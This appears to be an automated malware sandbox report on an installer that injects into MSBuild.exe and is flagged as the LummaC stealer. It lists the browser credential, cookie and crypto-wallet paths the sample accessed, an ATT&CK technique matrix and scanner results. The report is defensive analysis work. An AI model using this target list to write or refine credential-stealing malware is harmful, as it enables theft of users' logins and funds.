Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: Updater.exe	Binary or memory string: WIN_81
Source: Updater.exe	Binary or memory string: WIN_XP
Source: Updater.exe	Binary or memory string: WIN_XPe
Source: Updater.exe	Binary or memory string: WIN_VISTA
Source: is-7LJOT.tmp.3.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Updater.exe	Binary or memory string: WIN_7
Source: Updater.exe	Binary or memory string: WIN_8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU			Jump to behavior

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 7552, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00BA23E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		35_2_00BA23E0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe	Code function: 35_2_00BA1DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		35_2_00BA1DD8

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 Create Account	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	21 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	12 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	67 System Information Discovery	Distributed Component Object Model	21 Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 Masquerading	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	3 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-5MQFH.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-E0D1D.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-EUGF2.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvfvsdksvc_x64.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\hangbird\Updater.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\hangbird\is-7LJOT.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net02	0%	URL Reputation	safe
http://www.indyproject.org/	0%	URL Reputation	safe
https://www.remobjects.com/ps	0%	URL Reputation	safe
